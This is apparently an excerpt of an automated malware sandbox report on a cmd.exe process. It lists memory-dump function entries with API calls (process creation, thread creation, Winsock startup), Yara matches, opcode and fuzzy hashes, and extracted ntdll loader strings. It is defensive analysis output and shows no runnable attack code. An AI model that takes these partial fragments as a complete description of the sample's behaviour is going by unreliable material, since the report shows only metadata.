                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 74a1e5119f22510537e3e9e71567fc666ae6a69bd96f0efb277ed7411773a2b3
                                                                        • Instruction ID: 79974530e66f32c8aed8e2f81e2d5fefc9c0668506752ca302d3492dd183184c
                                                                        • Opcode Fuzzy Hash: 74a1e5119f22510537e3e9e71567fc666ae6a69bd96f0efb277ed7411773a2b3
                                                                        • Instruction Fuzzy Hash: 7A011EBDE4020DABDF14EBA4DC81F9EB3B99B44308F104295AD08D7641FA71EB54CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02847753,00000010,?,?,?,00000044,?,00000010,02847753,?,?,?), ref: 02857E60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 0bee5aa62eb7a68b3eb11ec3a28003d3c1e70a85095e1c32f088f8dbbb160fa5
                                                                        • Instruction ID: 9d68e07acf9a8551ebb564b8567265c5cb01d8d3b6409cc03f29dffb062e7959
                                                                        • Opcode Fuzzy Hash: 0bee5aa62eb7a68b3eb11ec3a28003d3c1e70a85095e1c32f088f8dbbb160fa5
                                                                        • Instruction Fuzzy Hash: 0C0172B6204108BBCB44DE99DC80EDB77ADAF8C754F518208BA09D3240D630E8518BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02839415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: cc356b699687411f09895b20681620837888c3ba7ed30d4cffb3667db5f715c7
                                                                        • Instruction ID: ebe2f33ff104f5134725c7c930cb481b0d20af8fe904ca9cc43ea0efac2abf49
                                                                        • Opcode Fuzzy Hash: cc356b699687411f09895b20681620837888c3ba7ed30d4cffb3667db5f715c7
                                                                        • Instruction Fuzzy Hash: 1DF06D7B38031436E23161AD9C02FDBB79DDB84BB1F244426FB0CEB1C0D991B9424AE9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02839415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 3c602b2bd6be7cc81fb36faa83d514dff230c528f19ca1bac33cba31f5391786
                                                                        • Instruction ID: 96205dec55f6ecde610d6380ccaaa372beaae6bbcff3d806582a4ab82e04695a
                                                                        • Opcode Fuzzy Hash: 3c602b2bd6be7cc81fb36faa83d514dff230c528f19ca1bac33cba31f5391786
                                                                        • Instruction Fuzzy Hash: C6E0927B78021036E271619C8C42FEB669A9B84B61F204015FB0CEB1C0D991B9424AE9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(02841099,?,0285496F,02841099,028540B7,0285496F,?,02841099,028540B7,00001000,?,?,02859606), ref: 02857D5C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 88ebfb8f9c9b83f5b57b70436600ca74cfd9b47edb27a84e6257e06cdcfa62f4
                                                                        • Instruction ID: 56a89355ea18c9608d1ae20ee72f7e5b93beedbce7fee2d88c3f873606ed5167
                                                                        • Opcode Fuzzy Hash: 88ebfb8f9c9b83f5b57b70436600ca74cfd9b47edb27a84e6257e06cdcfa62f4
                                                                        • Instruction Fuzzy Hash: 60E039752042087BD614EA59DC40F9B33ADDBC9710F004009FA08A7282CA30B9158AB9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0038B91C,00000007,00000000,00000004,00000000,02843741,000000F4,?,?,?,?,?), ref: 02857DAF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 5dacfb748006c6bb6ab6068bed5d9032331827d33326bd30cfa66d75f0c9dd16
                                                                        • Instruction ID: 4d772584b58c1c459cd248398f5bd543e10bde45eb1c3688761f3c6c487bdcad
                                                                        • Opcode Fuzzy Hash: 5dacfb748006c6bb6ab6068bed5d9032331827d33326bd30cfa66d75f0c9dd16
                                                                        • Instruction Fuzzy Hash: F9E06D752002087BD610EE59DC41F9B37ADDFC4710F004419FA08E7241CA30B9108AB9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 028477BC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 6f86805815b59758952611a47c7c36cd6d00460bb31b5773962a9047a25d1829
                                                                        • Instruction ID: 872f9713a09c4bca78f7209e8b9a214a4fc4d049d49ba7b6b0a82f85b325457e
                                                                        • Opcode Fuzzy Hash: 6f86805815b59758952611a47c7c36cd6d00460bb31b5773962a9047a25d1829
                                                                        • Instruction Fuzzy Hash: 8CE0807D14020C1BF7245578DC45F763358474CB24F644550B91CDB1C1DB74F5414590
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: c21aa5e7eb6eb1d8434e872a7158fe5c54a6173fa7f3692df5039f58f5884257
                                                                        • Instruction ID: 8f841cedce70063609bfc5e15f5c034158a3f382bb1b9e5b68675d921bcf9884
                                                                        • Opcode Fuzzy Hash: c21aa5e7eb6eb1d8434e872a7158fe5c54a6173fa7f3692df5039f58f5884257
                                                                        • Instruction Fuzzy Hash: 60C0125E75602C5BE41069596C4F8BE660CC6E682D704067AED09E6942F946C82D05A7
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02841390,028567D7,028540B7,?), ref: 028475D3
Memory Dump Source
• Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02841390,028567D7,028540B7,?), ref: 028475D3
Memory Dump Source
• Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Uniqueness
Uniqueness Score: -1.00%

Strings
• corrupted critical section, xrefs: 031754C2
• Thread is in a state in which it cannot own a critical section, xrefs: 03175543
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 031754E2
• Critical section address, xrefs: 03175425, 031754BC, 03175534
• undeleted critical section in freed memory, xrefs: 0317542B
• Critical section debug info address, xrefs: 0317541F, 0317552E
• Critical section address., xrefs: 03175502
• Invalid debug info address of this critical section, xrefs: 031754B6
• double initialized or corrupted critical section, xrefs: 03175508
• Thread identifier, xrefs: 0317553A
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 031754CE
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0317540A, 03175496, 03175519
• Address of the debug info found in the active list., xrefs: 031754AE, 031754FA
• 8, xrefs: 031752E3
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Uniqueness
Uniqueness Score: -1.00%

Strings
• AVRF: -*- final list of providers -*- , xrefs: 03188B8F
• VerifierDlls, xrefs: 03188CBD
• VerifierDebug, xrefs: 03188CA5
• VerifierFlags, xrefs: 03188C50
• HandleTraces, xrefs: 03188C8F
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 03188A67
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 03188A3D
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Uniqueness
Uniqueness Score: -1.00%

Strings
• minkernel\ntdll\ldrinit.c, xrefs: 03159A11, 03159A3A
• LdrpInitShimEngine, xrefs: 031599F4, 03159A07, 03159A30
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 03159A2A
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 03159A01
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 031599ED
• apphelp.dll, xrefs: 030F6496
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Uniqueness
Uniqueness Score: -1.00%

Strings
• RtlGetAssemblyStorageRoot, xrefs: 03172160, 0317219A, 031721BA
• SXS: %s() passed the empty activation context, xrefs: 03172165
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0317219F
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03172180
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03172178
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 031721BF
Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
                                                                        • Opcode ID: 54631dcbf633c731448b6c73f1b676c0cfdf8aad4483c8e202431a2e5580ddc1
                                                                        • Instruction ID: a744b96c05b06bc12597bc538c5ebb008a27882422f032730e1b168252ea8e2a
                                                                        • Opcode Fuzzy Hash: 54631dcbf633c731448b6c73f1b676c0cfdf8aad4483c8e202431a2e5580ddc1
                                                                        • Instruction Fuzzy Hash: B531E436F413147FE721EA95CC41F6EB779EBAEA90F090459BA04AB241D370DA43C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0313C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 031781E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03178181, 031781F5
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 03178170
                                                                        • LdrpInitializeImportRedirection, xrefs: 03178177, 031781EB
                                                                        • LdrpInitializeProcess, xrefs: 0313C6C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 562fdd9e657187a72d32cbc9d1de46c983fe8c6402edaff9eb674ffb775cec83
                                                                        • Instruction ID: cb284048d609a4051208ccf7859f5b33097ec3d61617f4da914ac0673d6ec65c
                                                                        • Opcode Fuzzy Hash: 562fdd9e657187a72d32cbc9d1de46c983fe8c6402edaff9eb674ffb775cec83
                                                                        • Instruction Fuzzy Hash: 803115B57447459FC214EF28D84AE1ABBE4EF8CB10F080958F890AF391DB20EC04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 03142DF0: LdrInitializeThunk.NTDLL ref: 03142DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140D74
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 877adf21f67a9021090585d50878673a77b7b33421a6d6b73ea214fff9d175f0
                                                                        • Instruction ID: 4cc09b6320ef564f0c358be456d8e0f5781936889f00c22a05762e30b7b0eefd
                                                                        • Opcode Fuzzy Hash: 877adf21f67a9021090585d50878673a77b7b33421a6d6b73ea214fff9d175f0
                                                                        • Instruction Fuzzy Hash: 0F425C75900715DFDB24CF25C880BAAB7F5FF48314F1845A9E989EB241E770AA85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 60e1fc11d22f709bd065fb3a17c3035d10ee10d7ad6d76aaf9df091a1e620769
                                                                        • Instruction ID: 5fb961ae8e2cf01baf425082edaed3c5651c775bfee327b826a59ef448eea474
                                                                        • Opcode Fuzzy Hash: 60e1fc11d22f709bd065fb3a17c3035d10ee10d7ad6d76aaf9df091a1e620769
                                                                        • Instruction Fuzzy Hash: E7C18D79108382CFC715CF58C040B6AB7F4BF88704F088969F995CB291E7B4D98ACB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03138421
                                                                        • @, xrefs: 03138591
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0313855E
                                                                        • LdrpInitializeProcess, xrefs: 03138422
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 56936b51c9ba11d5a1269594e8cdad6cf4dd18f75bce5d855f13422ee3d4223b
                                                                        • Instruction ID: fbaba059a942b3bf3787db18a405483ef6ef16ea99e6dbeaa43e16a5c28855f2
                                                                        • Opcode Fuzzy Hash: 56936b51c9ba11d5a1269594e8cdad6cf4dd18f75bce5d855f13422ee3d4223b
                                                                        • Instruction Fuzzy Hash: A4918A71648344AFD721EF61CC40FABBAECAF8D644F44092EFA849A150E734D9498B62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • SXS: %s() passed the empty activation context, xrefs: 031721DE
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 031721D9, 031722B1
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 031722B6
                                                                        • .Local, xrefs: 031328D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: f106b9a39fd311cd8c06e7f73bb74d694f1af47885c03487f6259c64d4068c56
                                                                        • Instruction ID: 6f49f7f4aa81a847afd8257792c3055fe5efb06768b6941967ad1991f2b2a769
